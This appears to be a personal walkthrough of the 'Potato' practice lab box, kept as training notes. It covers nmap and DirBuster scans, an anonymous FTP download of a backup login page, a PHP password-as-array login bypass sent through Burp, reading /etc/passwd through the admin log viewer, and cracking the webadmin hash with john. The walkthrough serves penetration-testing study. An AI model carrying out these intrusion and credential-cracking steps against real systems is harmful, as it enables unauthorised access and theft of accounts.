Target is: [LAB_IP]

Autorecon takes way too long for me so I'll run nmap for now

nmap -sV -sC -p-  -v [LAB_IP] --open -oN potato2.scan

I like knowing the serviceVersion and running nmap's sCripts on all ports in case they open some >ridiculous< port out there. -v is good to know if the system crashed or not and I only care about --open things.

Nmap scan report for [LAB_IP]

Host is up (0.071s latency).

Not shown: 61240 closed tcp ports (conn-refused), 4292 filtered tcp ports (no-response)

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 [HASH_REDACTED] (RSA)

|   256 [HASH_REDACTED] (ECDSA)

|_  256 [HASH_REDACTED] (ED25519)

80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-title: Potato company

| http-methods:

|_  Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.41 (Ubuntu)

2112/tcp open  ftp     ProFTPD

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| -rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak

|_-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.

Initiating NSE at 08:06

Completed NSE at 08:06, 0.00s elapsed

Initiating NSE at 08:06

Completed NSE at 08:06, 0.00s elapsed

Initiating NSE at 08:06

Completed NSE at 08:06, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 82.11 seconds

Now to check out the web port

Potato company

At the moment, there is nothing. This site is under construction. To make you wait, here is a photo of a potato:

Also wtf is up with this potato...

Now time to run directory scans on the web server

I like the gui of dirbuster minus the button glitch but I'm debating on using dirb due to it's ease of use or gobuster

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Starting OWASP DirBuster 1.0-RC1

Starting dir/file list based brute forcing

Dir found: / - 200

Dir found: /icons/ - 403

File found: /index.php - 200

Dir found: /admin/ - 200

File found: /admin/index.php - 200

Dir found: /icons/small/ - 403

navigation to admin/index.php

Now to check the weird FTP on 2112

ftp [LAB_IP] 2112                                                        08:10:15

Connected to [LAB_IP].

220 ProFTPD Server (Debian) [::ffff:[LAB_IP]]

Name ([LAB_IP]:kali): anonymous

331 Anonymous login ok, send your complete email address as your password

Password:

230-Welcome, archive user anonymous@[LAB_IP] !

230-

230-The local time is: Sun Jun 04 12:10:41 2023

230-

230 Anonymous access granted, restrictions apply

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

229 Entering Extended Passive Mode (|||31513|)

150 Opening ASCII mode data connection for file list

-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak

-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg

226 Transfer complete

ftp>get welcome.msg

ftp>get index.php.bak

→  cat welcome.msg                                                                 08:13:11

Welcome, archive user %U@%R !

The local time is: %T

kali  🏡  OSCP  Potato

→  cat index.php.bak                                                               08:13:13

Bad login/password!
Return to the login page

"; } exit(); } ?>

So try admin:potato...

Bad user/password!
Return to the login page

and it didn't take

Looking for ways to bypass their password authentication method yields this databyte

Basically pass the password as an array via password[ ] rather than the original one

Time to load up burp and shoot it over.

I opted to use burp's browser so I get less of a headache with the foxy proxy config

And I'm logged in

Welcome!
Go to the dashboard

Now in the admin dashboard I can see the following with their respective data dumped

HOME

Admin area

Access forbidden if you don't have permission to access

USERS

Users list:

• Admin

DATE

The curent time:

Sun Jun 4 12:48:50 UTC 2023

LOGS

Contenu du fichier log_01.txt :

Operation: password change

Date: January 03, 2020 / 11:25 a.m.

User: admin

Status: OK

Contenu du fichier log_02.txt :

Operation: reboot the server

Date: January 09, 2020 / 9:55 a.m.

User: admin

Status: OK

Contenu du fichier log_03.txt :

Operation: password change

Date: August 2, 2020 / 9:25 p.m.

User: admin

Status: OK

So since logs retrieves logs I'll try to retrieve etc/passwd

Cool so that worked. Now to crack the hash for webadmin

webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash

dump hash into a file and run john to attempt to crack it

→  vi hash                                                                                               08:56:21

kali  🏡  OSCP  Potato

→  john hash                                                                                             08:56:28

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"

Use the "--format=md5crypt-long" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])

Will run 8 OpenMP threads

Proceeding with single, rules:Single

Press 'q' or Ctrl-C to abort, almost any other key for status

Almost done: Processing the remaining buffered candidate passwords, if any.

Proceeding with wordlist:/usr/share/john/password.lst

dragon           (webadmin)